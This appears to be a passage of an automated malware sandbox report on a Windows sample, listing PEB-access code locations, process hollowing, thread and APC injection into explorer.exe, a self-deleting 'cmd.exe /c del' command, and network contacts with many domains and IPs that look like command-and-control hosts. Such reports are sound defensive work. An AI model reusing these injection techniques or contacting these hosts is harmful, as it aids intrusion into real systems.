          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DEDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E95BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DFB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DD1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DD1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E8138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E7D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DCF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DCDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E98B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DCDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E8131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E5B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E090AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DFF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DFF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DFF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E43884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E43884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DE0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DE0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E82073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E91074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DDB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DDB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DDB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DDB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E94015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E94015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E541E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DCB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DCB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DCB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E469A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DFA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DEC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DEB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DEB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DCB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DCB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DCC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DE4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DE4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DE4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DE4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DE4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E7FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E08EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DD76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E98ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E446A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E5FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E8AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E8AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DD766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DFA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DFA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E7FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DCC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DCC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DCC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DF8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E81608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DCE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E037F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DD8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E98F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DDEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DDFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DEF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DFA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DFA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E9070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E9070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DFE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DC4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E5FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E5FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E814FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E98CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DD849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DFA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DE746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E5C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E5C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DFBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E78DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E46DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DDD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DDD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DFFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02DFFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\help.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 142.111.76.118 80
          Source: C:\Windows\explorer.exeNetwork Connect: 15.165.26.252 80
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.130.43 80
          Source: C:\Windows\explorer.exeNetwork Connect: 81.17.18.198 80
          Source: C:\Windows\explorer.exeDomain query: www.appearwood.club
          Source: C:\Windows\explorer.exeDomain query: www.warungjitu.com
          Source: C:\Windows\explorer.exeNetwork Connect: 3.13.255.157 80
          Source: C:\Windows\explorer.exeDomain query: www.theartsutra.com
          Source: C:\Windows\explorer.exeDomain query: www.chestfreezersale.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.7.67 80
          Source: C:\Windows\explorer.exeNetwork Connect: 192.0.78.25 80
          Source: C:\Windows\explorer.exeDomain query: www.betbonusuk.com
          Source: C:\Windows\explorer.exeDomain query: www.rosewoodcibubur.com
          Source: C:\Windows\explorer.exeDomain query: www.omxpro.com
          Source: C:\Windows\explorer.exeDomain query: www.moretuantired.com
          Source: C:\Windows\explorer.exeDomain query: www.peridot.website
          Source: C:\Windows\explorer.exeDomain query: www.weluvweb.com
          Source: C:\Windows\explorer.exeDomain query: www.okitmall.com
          Source: C:\Windows\explorer.exeNetwork Connect: 52.206.71.220 80
          Source: C:\Windows\explorer.exeDomain query: www.emmajanetracy.com
          Source: C:\Windows\explorer.exeNetwork Connect: 52.56.126.26 80
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeMemory written: C:\Users\user\Desktop\s6G3ZtvHZg.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeThread register set: target process: 3292
          Source: C:\Windows\SysWOW64\help.exeThread register set: target process: 3292
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeSection unmapped: C:\Windows\SysWOW64\help.exe base address: BF0000
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess created: C:\Users\user\Desktop\s6G3ZtvHZg.exe C:\Users\user\Desktop\s6G3ZtvHZg.exe
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess created: C:\Users\user\Desktop\s6G3ZtvHZg.exe C:\Users\user\Desktop\s6G3ZtvHZg.exe
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\s6G3ZtvHZg.exe'
          Source: explorer.exe, 00000004.00000002.507005396.0000000001400000.00000002.00000001.sdmp, help.exe, 0000000E.00000002.511685325.00000000053C0000.00000002.00000001.sdmpBinary or memory string: uProgram Manager
          Source: explorer.exe, 00000004.00000002.507005396.0000000001400000.00000002.00000001.sdmp, help.exe, 0000000E.00000002.511685325.00000000053C0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000002.507005396.0000000001400000.00000002.00000001.sdmp, help.exe, 0000000E.00000002.511685325.00000000053C0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000002.507005396.0000000001400000.00000002.00000001.sdmp, help.exe, 0000000E.00000002.511685325.00000000053C0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000002.505741956.0000000000EB8000.00000004.00000020.sdmpBinary or memory string: ProgmanX
          Source: explorer.exe, 00000004.00000000.276627060.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndAj
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Users\user\Desktop\s6G3ZtvHZg.exe VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
